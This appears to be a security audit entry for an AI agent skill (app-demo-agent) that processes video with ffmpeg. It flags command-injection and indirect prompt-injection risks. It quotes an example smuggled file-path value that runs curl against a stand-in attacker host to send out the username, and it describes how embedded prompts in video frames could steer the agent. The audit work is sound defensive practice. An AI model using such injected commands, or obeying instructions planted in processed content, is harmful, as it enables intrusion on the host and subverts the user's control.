The Agent Skills Directory

[COMMAND_EXECUTION]: The instructions in SKILL.md (specifically Steps 2, 3, 4, 5, 7, and 8) direct the agent to execute shell commands using placeholders for user-supplied data, such as INPUT_VIDEO and background colors. If a user provides a maliciously crafted string (e.g., path/to/video.mp4; curl http://attacker.com/$(whoami)), it could result in arbitrary command execution on the host system.- [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection (Category 8) as it processes untrusted video content to generate descriptive narration.
Ingestion points: User-provided video files specified by the INPUT_VIDEO path in SKILL.md.
Boundary markers: Absent; the skill lacks delimiters or instructions to ignore embedded visual or text-based prompts within the video frames during analysis.
Capability inventory: Execution of ffmpeg and ffprobe, file system writes for project management, and network API interactions via referenced TTS and music generation scripts.
Sanitization: Absent; there is no validation of the video content or sanitization of user-provided file paths before they are used in sensitive subprocess operations.
[SAFE]: The Python script scripts/extract_frames.py follows security best practices by using the list-based subprocess.run method rather than shell-string execution, which mitigates injection risks within the script itself.

app-demo-agent